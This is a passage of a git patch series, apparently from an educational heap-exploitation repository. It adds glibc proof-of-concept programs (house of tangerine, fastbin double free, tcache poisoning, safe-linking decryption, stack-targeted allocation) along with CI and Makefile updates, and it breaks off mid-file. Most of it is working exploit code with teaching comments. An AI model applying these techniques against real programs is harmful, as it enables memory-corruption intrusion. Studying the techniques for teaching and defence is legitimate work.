2.32) + heap_ptr[(vuln_tcache - (size_t) heap_ptr) / SIZE_SZ] = target ^ (vuln_tcache >> 12); + + // allocate first tcache (corrupt next tcache bin) + heap_ptr = malloc(SIZE_1); + + // get arbitrary ptr for reads or writes + heap_ptr = malloc(SIZE_1); + + // proof that heap_ptr now points to the same string as target + assert((size_t) heap_ptr == target); + puts((char *) heap_ptr); +} diff --git a/glibc_2.37/house_of_tangerine.c b/glibc_2.37/house_of_tangerine.c new file mode 100644 index 0000000..fe789a2 --- /dev/null +++ b/glibc_2.37/house_of_tangerine.c @@ -0,0 +1,161 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN 0x10L +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// size used for poisoned tcache +#define CHUNK_SIZE_1 0x40 +#define SIZE_1 (CHUNK_SIZE_1-CHUNK_HDR_SZ) + +// could also be split into multiple lower size allocations +#define CHUNK_SIZE_3 (PAGESIZE-(2*MALLOC_ALIGN)-CHUNK_SIZE_1) +#define SIZE_3 (CHUNK_SIZE_3-CHUNK_HDR_SZ) + +/** + * Tested on GLIBC 2.34 (x86_64, x86 & aarch64) & 2.39 (x86_64, x86 & aarch64) + * + * House of Tangerine is the modernized version of House of Orange + * and is able to corrupt heap without needing to call free() directly + * + * it uses the _int_free call to the top_chunk (wilderness) in sysmalloc + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * tcache-poisoning is used to trick malloc into returning a malloc aligned arbitrary pointer + * by abusing the tcache freelist. (requires heap leak on and after 2.32) + * + * this version expects a positive and negative OOB (e.g. BOF) + * or a positive OOB in editing a previous chunk + * + * This version requires 5 (6*) malloc calls and 3 OOB + * + * *to make the PoC more reliable we need to malloc and probe the current top chunk size, + * this should be predictable in an actual exploit and therefore, can be removed to get 5 malloc calls instead + * + * Special Thanks to pepsipu for creating the challenge "High Frequency Trading" + * from Pico CTF 2024 that inspired this exploitation technique + */ +int main() { + size_t size_2, *top_size_ptr, top_size, new_top_size, freed_top_size, vuln_tcache, target, *heap_ptr; + char win[0x10] = "WIN\0WIN\0WIN\0\x06\xfe\x1b\xe2"; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_SIZE_1 & MALLOC_MASK) == CHUNK_SIZE_1); + assert((CHUNK_SIZE_3 & MALLOC_MASK) == CHUNK_SIZE_3); + + puts("Constants:"); + printf("chunk header = 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align = 0x%lx\n", MALLOC_ALIGN); + printf("page align = 0x%lx\n", PAGESIZE); + printf("fencepost size = 0x%lx\n", FENCEPOST); + printf("size_1 = 0x%lx\n", SIZE_1); + + printf("target tcache top size = 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_SIZE_1); + + // target is malloc aligned 0x10 + target = ((size_t) win + (MALLOC_ALIGN - 1)) & MALLOC_MASK; + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + heap_ptr = malloc(PROBE); + top_size = heap_ptr[(PROBE / SIZE_SZ) + 1]; + printf("first top size = 0x%lx\n", top_size); + + // calculate size_2 + + size_2 = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_SIZE_1; + size_2 &= PAGE_MASK; + size_2 &= MALLOC_MASK; + + + printf("size_2 = 0x%lx\n", size_2); + + // first allocation + heap_ptr = malloc(size_2); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &heap_ptr[(size_2 / SIZE_SZ) - 1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("first top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("new first top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_SIZE_1); + + /* + * malloc (larger than available_top_size), to free previous top_chunk using _int_free. + * This happens inside sysmalloc, where the top_chunk gets freed if it can't be merged + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * we prevent the top_chunk from being merged by lowering its size + * we can also circumvent corruption checks by keeping PAGE_MASK bits unchanged + */ + + printf("size_3 = 0x%lx\n", SIZE_3); + heap_ptr = malloc(SIZE_3); + + top_size = heap_ptr[(SIZE_3 / SIZE_SZ) + 1]; + printf("current top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + new_top_size = top_size & PAGE_MASK; + heap_ptr[(SIZE_3 / SIZE_SZ) + 1] = new_top_size; + printf("new top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + printf("freed top_chunk size = 0x%lx\n", freed_top_size); + + assert(freed_top_size == CHUNK_SIZE_1); + + // this will be our vuln_tcache for tcache poisoning + vuln_tcache = (size_t) &heap_ptr[(SIZE_3 / SIZE_SZ) + 2]; + + printf("tcache next ptr: 0x%lx\n", vuln_tcache); + + // free the previous top_chunk + heap_ptr = malloc(SIZE_3); + + // corrupt next ptr into pointing to target + // use a heap leak to bypass safe linking (GLIBC >= 2.32) + heap_ptr[(vuln_tcache - (size_t) heap_ptr) / SIZE_SZ] = target ^ (vuln_tcache >> 12); + + // allocate first tcache (corrupt next tcache bin) + heap_ptr = malloc(SIZE_1); + + // get arbitrary ptr for reads or writes + heap_ptr = malloc(SIZE_1); + + // proof that heap_ptr now points to the same string as target + assert((size_t) heap_ptr == target); + puts((char *) heap_ptr); +} diff --git a/glibc_2.38/house_of_tangerine.c b/glibc_2.38/house_of_tangerine.c new file mode 100644 index 0000000..fe789a2 --- /dev/null +++ b/glibc_2.38/house_of_tangerine.c @@ -0,0 +1,161 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN 0x10L +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// size used for poisoned tcache +#define CHUNK_SIZE_1 0x40 +#define SIZE_1 (CHUNK_SIZE_1-CHUNK_HDR_SZ) + +// could also be split into multiple lower size allocations +#define CHUNK_SIZE_3 (PAGESIZE-(2*MALLOC_ALIGN)-CHUNK_SIZE_1) +#define SIZE_3 (CHUNK_SIZE_3-CHUNK_HDR_SZ) + +/** + * Tested on GLIBC 2.34 (x86_64, x86 & aarch64) & 2.39 (x86_64, x86 & aarch64) + * + * House of Tangerine is the modernized version of House of Orange + * and is able to corrupt heap without needing to call free() directly + * + * it uses the _int_free call to the top_chunk (wilderness) in sysmalloc + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * tcache-poisoning is used to trick malloc into returning a malloc aligned arbitrary pointer + * by abusing the tcache freelist. (requires heap leak on and after 2.32) + * + * this version expects a positive and negative OOB (e.g. BOF) + * or a positive OOB in editing a previous chunk + * + * This version requires 5 (6*) malloc calls and 3 OOB + * + * *to make the PoC more reliable we need to malloc and probe the current top chunk size, + * this should be predictable in an actual exploit and therefore, can be removed to get 5 malloc calls instead + * + * Special Thanks to pepsipu for creating the challenge "High Frequency Trading" + * from Pico CTF 2024 that inspired this exploitation technique + */ +int main() { + size_t size_2, *top_size_ptr, top_size, new_top_size, freed_top_size, vuln_tcache, target, *heap_ptr; + char win[0x10] = "WIN\0WIN\0WIN\0\x06\xfe\x1b\xe2"; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_SIZE_1 & MALLOC_MASK) == CHUNK_SIZE_1); + assert((CHUNK_SIZE_3 & MALLOC_MASK) == CHUNK_SIZE_3); + + puts("Constants:"); + printf("chunk header = 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align = 0x%lx\n", MALLOC_ALIGN); + printf("page align = 0x%lx\n", PAGESIZE); + printf("fencepost size = 0x%lx\n", FENCEPOST); + printf("size_1 = 0x%lx\n", SIZE_1); + + printf("target tcache top size = 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_SIZE_1); + + // target is malloc aligned 0x10 + target = ((size_t) win + (MALLOC_ALIGN - 1)) & MALLOC_MASK; + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + heap_ptr = malloc(PROBE); + top_size = heap_ptr[(PROBE / SIZE_SZ) + 1]; + printf("first top size = 0x%lx\n", top_size); + + // calculate size_2 + + size_2 = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_SIZE_1; + size_2 &= PAGE_MASK; + size_2 &= MALLOC_MASK; + + + printf("size_2 = 0x%lx\n", size_2); + + // first allocation + heap_ptr = malloc(size_2); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &heap_ptr[(size_2 / SIZE_SZ) - 1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("first top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("new first top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_SIZE_1); + + /* + * malloc (larger than available_top_size), to free previous top_chunk using _int_free. + * This happens inside sysmalloc, where the top_chunk gets freed if it can't be merged + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * we prevent the top_chunk from being merged by lowering its size + * we can also circumvent corruption checks by keeping PAGE_MASK bits unchanged + */ + + printf("size_3 = 0x%lx\n", SIZE_3); + heap_ptr = malloc(SIZE_3); + + top_size = heap_ptr[(SIZE_3 / SIZE_SZ) + 1]; + printf("current top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + new_top_size = top_size & PAGE_MASK; + heap_ptr[(SIZE_3 / SIZE_SZ) + 1] = new_top_size; + printf("new top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + printf("freed top_chunk size = 0x%lx\n", freed_top_size); + + assert(freed_top_size == CHUNK_SIZE_1); + + // this will be our vuln_tcache for tcache poisoning + vuln_tcache = (size_t) &heap_ptr[(SIZE_3 / SIZE_SZ) + 2]; + + printf("tcache next ptr: 0x%lx\n", vuln_tcache); + + // free the previous top_chunk + heap_ptr = malloc(SIZE_3); + + // corrupt next ptr into pointing to target + // use a heap leak to bypass safe linking (GLIBC >= 2.32) + heap_ptr[(vuln_tcache - (size_t) heap_ptr) / SIZE_SZ] = target ^ (vuln_tcache >> 12); + + // allocate first tcache (corrupt next tcache bin) + heap_ptr = malloc(SIZE_1); + + // get arbitrary ptr for reads or writes + heap_ptr = malloc(SIZE_1); + + // proof that heap_ptr now points to the same string as target + assert((size_t) heap_ptr == target); + puts((char *) heap_ptr); +} From ae4dbf558203d72296e443e326d885b0f7994e63 Mon Sep 17 00:00:00 2001 From: Kyle Zeng Date: Tue, 16 Apr 2024 22:19:14 -0700 Subject: [PATCH 3/3] add 2.39 --- .github/workflows/ci.yml | 26 +- Makefile | 4 +- glibc_2.39/decrypt_safe_linking.c | 66 ++++ glibc_2.39/fastbin_dup.c | 50 +++ glibc_2.39/fastbin_dup_consolidate.c | 43 +++ glibc_2.39/fastbin_dup_into_stack.c | 77 +++++ glibc_2.39/fastbin_reverse_into_tcache.c | 104 ++++++ glibc_2.39/house_of_botcake.c | 75 +++++ glibc_2.39/house_of_einherjar.c | 157 +++++++++ glibc_2.39/house_of_lore.c | 137 ++++++++ glibc_2.39/house_of_mind_fastbin.c | 235 +++++++++++++ glibc_2.39/house_of_spirit.c | 48 +++ glibc_2.39/house_of_water.c | 370 +++++++++++++++++++++ glibc_2.39/large_bin_attack.c | 94 ++++++ glibc_2.39/mmap_overlapping_chunks.c | 140 ++++++++ glibc_2.39/overlapping_chunks.c | 82 +++++ glibc_2.39/poison_null_byte.c | 161 +++++++++ glibc_2.39/safe_link_double_protect.c | 128 +++++++ glibc_2.39/sysmalloc_int_free.c | 3 +- glibc_2.39/tcache_house_of_spirit.c | 44 +++ glibc_2.39/tcache_poisoning.c | 63 ++++ glibc_2.39/tcache_stashing_unlink_attack.c | 80 +++++ glibc_2.39/unsafe_unlink.c | 64 ++++ 23 files changed, 2236 insertions(+), 15 deletions(-) create mode 100644 glibc_2.39/decrypt_safe_linking.c create mode 100644 glibc_2.39/fastbin_dup.c create mode 100644 glibc_2.39/fastbin_dup_consolidate.c create mode 100644 glibc_2.39/fastbin_dup_into_stack.c create mode 100644 glibc_2.39/fastbin_reverse_into_tcache.c create mode 100644 glibc_2.39/house_of_botcake.c create mode 100644 glibc_2.39/house_of_einherjar.c create mode 100644 glibc_2.39/house_of_lore.c create mode 100644 glibc_2.39/house_of_mind_fastbin.c create mode 100644 glibc_2.39/house_of_spirit.c create mode 100644 glibc_2.39/house_of_water.c create mode 100644 glibc_2.39/large_bin_attack.c create mode 100644 glibc_2.39/mmap_overlapping_chunks.c create mode 100644 glibc_2.39/overlapping_chunks.c create mode 100644 glibc_2.39/poison_null_byte.c create mode 100644 glibc_2.39/safe_link_double_protect.c create mode 100644 glibc_2.39/tcache_house_of_spirit.c create mode 100644 glibc_2.39/tcache_poisoning.c create mode 100644 glibc_2.39/tcache_stashing_unlink_attack.c create mode 100644 glibc_2.39/unsafe_unlink.c diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index ed69079..0325f8b 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -152,16 +152,16 @@ jobs: with: ubuntu: '23.10' glibc: '2.38' - # v2_39: - # runs-on: ubuntu-22.04 - # name: glibc-v2.39 - # steps: - # - name: build how2heap - # uses: shellphish/how2heap/ci/build@master - # with: - # ubuntu: '24.04' - # - name: test how2heap - # uses: shellphish/how2heap/ci/test@master - # with: - # ubuntu: '24.04' - # glibc: '2.39' + v2_39: + runs-on: ubuntu-22.04 + name: glibc-v2.39 + steps: + - name: build how2heap + uses: shellphish/how2heap/ci/build@master + with: + ubuntu: '24.04' + - name: test how2heap + uses: shellphish/how2heap/ci/test@master + with: + ubuntu: '24.04' + glibc: '2.39' diff --git a/Makefile b/Makefile index 27bfc2e..9d2786d 100644 --- a/Makefile +++ b/Makefile @@ -10,6 +10,7 @@ V2.35 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_int V2.36 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free house_of_tangerine V2.37 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free house_of_tangerine V2.38 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free house_of_tangerine +V2.39 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free house_of_tangerine # turn technique names into paths VV2.23 = $(addprefix glibc_2.23/, $(V2.23)) @@ -23,8 +24,9 @@ VV2.35 = $(addprefix glibc_2.35/, $(V2.35)) VV2.36 = $(addprefix glibc_2.36/, $(V2.36)) VV2.37 = $(addprefix glibc_2.37/, $(V2.37)) VV2.38 = $(addprefix glibc_2.38/, $(V2.38)) +VV2.39 = $(addprefix glibc_2.39/, $(V2.39)) -PROGRAMS = $(BASE) $(VV2.23) $(VV2.24) $(VV2.27) $(VV2.31) $(VV2.32) $(VV2.33) $(VV2.34) $(VV2.35) $(VV2.36) $(VV2.37) $(VV2.38) +PROGRAMS = $(BASE) $(VV2.23) $(VV2.24) $(VV2.27) $(VV2.31) $(VV2.32) $(VV2.33) $(VV2.34) $(VV2.35) $(VV2.36) $(VV2.37) $(VV2.38) $(VV2.39) CFLAGS += -std=c99 -g -Wno-unused-result -Wno-free-nonheap-object LDLIBS += -ldl diff --git a/glibc_2.39/decrypt_safe_linking.c b/glibc_2.39/decrypt_safe_linking.c new file mode 100644 index 0000000..aaf0340 --- /dev/null +++ b/glibc_2.39/decrypt_safe_linking.c @@ -0,0 +1,66 @@ +#include +#include +#include + +long decrypt(long cipher) +{ + puts("The decryption uses the fact that the first 12bit of the plaintext (the fwd pointer) is known,"); + puts("because of the 12bit sliding."); + puts("And the key, the ASLR value, is the same with the leading bits of the plaintext (the fwd pointer)"); + long key = 0; + long plain; + + for(int i=1; i<6; i++) { + int bits = 64-12*i; + if(bits < 0) bits = 0; + plain = ((cipher ^ key) >> bits) << bits; + key = plain >> 12; + printf("round %d:\n", i); + printf("key: %#016lx\n", key); + printf("plain: %#016lx\n", plain); + printf("cipher: %#016lx\n\n", cipher); + } + return plain; +} + +int main() +{ + /* + * This technique demonstrates how to recover the original content from a poisoned + * value because of the safe-linking mechanism. + * The attack uses the fact that the first 12 bit of the plaintext (pointer) is known + * and the key (ASLR slide) is the same to the pointer's leading bits. + * As a result, as long as the chunk where the pointer is stored is at the same page + * of the pointer itself, the value of the pointer can be fully recovered. + * Otherwise, we can also recover the pointer with the page-offset between the storer + * and the pointer. What we demonstrate here is a special case whose page-offset is 0. + * For demonstrations of other more general cases, plz refer to + * https://github.com/n132/Dec-Safe-Linking + */ + + setbuf(stdin, NULL); + setbuf(stdout, NULL); + + // step 1: allocate chunks + long *a = malloc(0x20); + long *b = malloc(0x20); + printf("First, we create chunk a @ %p and chunk b @ %p\n", a, b); + malloc(0x10); + puts("And then create a padding chunk to prevent consolidation."); + + + // step 2: free chunks + puts("Now free chunk a and then free chunk b."); + free(a); + free(b); + printf("Now the freelist is: [%p -> %p]\n", b, a); + printf("Due to safe-linking, the value actually stored at b[0] is: %#lx\n", b[0]); + + // step 3: recover the values + puts("Now decrypt the poisoned value"); + long plaintext = decrypt(b[0]); + + printf("value: %p\n", a); + printf("recovered value: %#lx\n", plaintext); + assert(plaintext == (long)a); +} diff --git a/glibc_2.39/fastbin_dup.c b/glibc_2.39/fastbin_dup.c new file mode 100644 index 0000000..9d7d356 --- /dev/null +++ b/glibc_2.39/fastbin_dup.c @@ -0,0 +1,50 @@ +#include +#include +#include + +int main() +{ + setbuf(stdout, NULL); + + printf("This file demonstrates a simple double-free attack with fastbins.\n"); + + printf("Fill up tcache first.\n"); + void *ptrs[8]; + for (int i=0; i<8; i++) { + ptrs[i] = malloc(8); + } + for (int i=0; i<7; i++) { + free(ptrs[i]); + } + + printf("Allocating 3 buffers.\n"); + int *a = calloc(1, 8); + int *b = calloc(1, 8); + int *c = calloc(1, 8); + + printf("1st calloc(1, 8): %p\n", a); + printf("2nd calloc(1, 8): %p\n", b); + printf("3rd calloc(1, 8): %p\n", c); + + printf("Freeing the first one...\n"); + free(a); + + printf("If we free %p again, things will crash because %p is at the top of the free list.\n", a, a); + // free(a); + + printf("So, instead, we'll free %p.\n", b); + free(b); + + printf("Now, we can free %p again, since it's not the head of the free list.\n", a); + free(a); + + printf("Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we'll get %p twice!\n", a, b, a, a); + a = calloc(1, 8); + b = calloc(1, 8); + c = calloc(1, 8); + printf("1st calloc(1, 8): %p\n", a); + printf("2nd calloc(1, 8): %p\n", b); + printf("3rd calloc(1, 8): %p\n", c); + + assert(a == c); +} diff --git a/glibc_2.39/fastbin_dup_consolidate.c b/glibc_2.39/fastbin_dup_consolidate.c new file mode 100644 index 0000000..35af2b0 --- /dev/null +++ b/glibc_2.39/fastbin_dup_consolidate.c @@ -0,0 +1,43 @@ +#include +#include +#include + +int main() { + // reference: https://valsamaras.medium.com/the-toddlers-introduction-to-heap-exploitation-fastbin-dup-consolidate-part-4-2-ce6d68136aa8 + puts("This is a powerful technique that bypasses the double free check in tcachebin."); + printf("Fill up the tcache list to force the fastbin usage...\n"); + + void *ptr[7]; + + for(int i = 0; i < 7; i++) + ptr[i] = malloc(0x40); + for(int i = 0; i < 7; i++) + free(ptr[i]); + + void* p1 = calloc(1,0x40); + + printf("Allocate another chunk of the same size p1=%p \n", p1); + printf("Freeing p1 will add this chunk to the fastbin list...\n\n"); + free(p1); + + void* p3 = malloc(0x400); + printf("Allocating a tcache-sized chunk (p3=%p)\n", p3); + printf("will trigger the malloc_consolidate and merge\n"); + printf("the fastbin chunks into the top chunk, thus\n"); + printf("p1 and p3 are now pointing to the same chunk !\n\n"); + + assert(p1 == p3); + + printf("Triggering the double free vulnerability!\n\n"); + free(p1); + + void *p4 = malloc(0x400); + + assert(p4 == p3); + + printf("The double free added the chunk referenced by p1 \n"); + printf("to the tcache thus the next similar-size malloc will\n"); + printf("point to p3: p3=%p, p4=%p\n\n",p3, p4); + + return 0; +} diff --git a/glibc_2.39/fastbin_dup_into_stack.c b/glibc_2.39/fastbin_dup_into_stack.c new file mode 100644 index 0000000..b84be5a --- /dev/null +++ b/glibc_2.39/fastbin_dup_into_stack.c @@ -0,0 +1,77 @@ +#include +#include +#include + +int main() +{ + fprintf(stderr, "This file extends on fastbin_dup.c by tricking calloc into\n" + "returning a pointer to a controlled location (in this case, the stack).\n"); + + + fprintf(stderr,"Fill up tcache first.\n"); + + void *ptrs[7]; + + for (int i=0; i<7; i++) { + ptrs[i] = malloc(8); + } + for (int i=0; i<7; i++) { + free(ptrs[i]); + } + + + unsigned long stack_var[2] __attribute__ ((aligned (0x10))); + + fprintf(stderr, "The address we want calloc() to return is %p.\n", stack_var); + + fprintf(stderr, "Allocating 3 buffers.\n"); + int *a = calloc(1,8); + int *b = calloc(1,8); + int *c = calloc(1,8); + + fprintf(stderr, "1st calloc(1,8): %p\n", a); + fprintf(stderr, "2nd calloc(1,8): %p\n", b); + fprintf(stderr, "3rd calloc(1,8): %p\n", c); + + fprintf(stderr, "Freeing the first one...\n"); //First call to free will add a reference to the fastbin + free(a); + + fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\n", a, a); + + fprintf(stderr, "So, instead, we'll free %p.\n", b); + free(b); + + //Calling free(a) twice renders the program vulnerable to Double Free + + fprintf(stderr, "Now, we can free %p again, since it's not the head of the free list.\n", a); + free(a); + + fprintf(stderr, "Now the free list has [ %p, %p, %p ]. " + "We'll now carry out our attack by modifying data at %p.\n", a, b, a, a); + unsigned long *d = calloc(1,8); + + fprintf(stderr, "1st calloc(1,8): %p\n", d); + fprintf(stderr, "2nd calloc(1,8): %p\n", calloc(1,8)); + fprintf(stderr, "Now the free list has [ %p ].\n", a); + fprintf(stderr, "Now, we have access to %p while it remains at the head of the free list.\n" + "so now we are writing a fake free size (in this case, 0x20) to the stack,\n" + "so that calloc will think there is a free chunk there and agree to\n" + "return a pointer to it.\n", a); + stack_var[1] = 0x20; + + fprintf(stderr, "Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n", a); + fprintf(stderr, "Notice that the stored value is not a pointer but a poisoned value because of the safe linking mechanism.\n"); + fprintf(stderr, "^ Reference: https://research.checkpoint.com/2020/safe-linking-eliminating-a-20-year-old-malloc-exploit-primitive/\n"); + unsigned long ptr = (unsigned long)stack_var; + unsigned long addr = (unsigned long) d; + /*VULNERABILITY*/ + *d = (addr >> 12) ^ ptr; + /*VULNERABILITY*/ + + fprintf(stderr, "3rd calloc(1,8): %p, putting the stack address on the free list\n", calloc(1,8)); + + void *p = calloc(1,8); + + fprintf(stderr, "4th calloc(1,8): %p\n", p); + assert((unsigned long)p == (unsigned long)stack_var + 0x10); +} diff --git a/glibc_2.39/fastbin_reverse_into_tcache.c b/glibc_2.39/fastbin_reverse_into_tcache.c new file mode 100644 index 0000000..dfdc382 --- /dev/null +++ b/glibc_2.39/fastbin_reverse_into_tcache.c @@ -0,0 +1,104 @@ +#include +#include +#include +#include + +const size_t allocsize = 0x40; + +int main(){ + setbuf(stdout, NULL); + + printf("\n" + "This attack is intended to have a similar effect to the unsorted_bin_attack,\n" + "except it works with a small allocation size (allocsize <= 0x78).\n" + "The goal is to set things up so that a call to malloc(allocsize) will write\n" + "a large unsigned value to the stack.\n\n"); + printf("After the patch https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=a1a486d70ebcc47a686ff5846875eacad0940e41,\n" + "An heap address leak is needed to perform this attack.\n" + "The same patch also ensures the chunk returned by tcache is properly aligned.\n\n"); + + // Allocate 14 times so that we can free later. + char* ptrs[14]; + size_t i; + for (i = 0; i < 14; i++) { + ptrs[i] = malloc(allocsize); + } + + printf("First we need to free(allocsize) at least 7 times to fill the tcache.\n" + "(More than 7 times works fine too.)\n\n"); + + // Fill the tcache. + for (i = 0; i < 7; i++) free(ptrs[i]); + + char* victim = ptrs[7]; + printf("The next pointer that we free is the chunk that we're going to corrupt: %p\n" + "It doesn't matter if we corrupt it now or later. Because the tcache is\n" + "already full, it will go in the fastbin.\n\n", victim); + free(victim); + + printf("Next we need to free between 1 and 6 more pointers. These will also go\n" + "in the fastbin. If the stack address that we want to overwrite is not zero\n" + "then we need to free exactly 6 more pointers, otherwise the attack will\n" + "cause a segmentation fault. But if the value on the stack is zero then\n" + "a single free is sufficient.\n\n"); + + // Fill the fastbin. + for (i = 8; i < 14; i++) free(ptrs[i]); + + // Create an array on the stack and initialize it with garbage. + size_t stack_var[6]; + memset(stack_var, 0xcd, sizeof(stack_var)); + + printf("The stack address that we intend to target: %p\n" + "It's current value is %p\n", &stack_var[2], (char*)stack_var[2]); + + printf("Now we use a vulnerability such as a buffer overflow or a use-after-free\n" + "to overwrite the next pointer at address %p\n\n", victim); + + //------------VULNERABILITY----------- + + // Overwrite linked list pointer in victim. + // The following operation assumes the address of victim is known, thus requiring + // a heap leak. + *(size_t**)victim = (size_t*)((long)&stack_var[0] ^ ((long)victim >> 12)); + + //------------------------------------ + + printf("The next step is to malloc(allocsize) 7 times to empty the tcache.\n\n"); + + // Empty tcache. + for (i = 0; i < 7; i++) ptrs[i] = malloc(allocsize); + + printf("Let's just print the contents of our array on the stack now,\n" + "to show that it hasn't been modified yet.\n\n"); + + for (i = 0; i < 6; i++) printf("%p: %p\n", &stack_var[i], (char*)stack_var[i]); + + printf("\n" + "The next allocation triggers the stack to be overwritten. The tcache\n" + "is empty, but the fastbin isn't, so the next allocation comes from the\n" + "fastbin. Also, 7 chunks from the fastbin are used to refill the tcache.\n" + "Those 7 chunks are copied in reverse order into the tcache, so the stack\n" + "address that we are targeting ends up being the first chunk in the tcache.\n" + "It contains a pointer to the next chunk in the list, which is why a heap\n" + "pointer is written to the stack.\n" + "\n" + "Earlier we said that the attack will also work if we free fewer than 6\n" + "extra pointers to the fastbin, but only if the value on the stack is zero.\n" + "That's because the value on the stack is treated as a next pointer in the\n" + "linked list and it will trigger a crash if it isn't a valid pointer or null.\n" + "\n" + "The contents of our array on the stack now look like this:\n\n"); + + malloc(allocsize); + + for (i = 0; i < 6; i++) printf("%p: %p\n", &stack_var[i], (char*)stack_var[i]); + + char *q = malloc(allocsize); + printf("\n" + "Finally, if we malloc one more time then we get the stack address back: %p\n", q); + + assert(q == (char *)&stack_var[2]); + + return 0; +} diff --git a/glibc_2.39/house_of_botcake.c b/glibc_2.39/house_of_botcake.c new file mode 100644 index 0000000..0f8e53b --- /dev/null +++ b/glibc_2.39/house_of_botcake.c @@ -0,0 +1,75 @@ +#include +#include +#include +#include +#include +#include + + +int main() +{ + /* + * This attack should bypass the restriction introduced 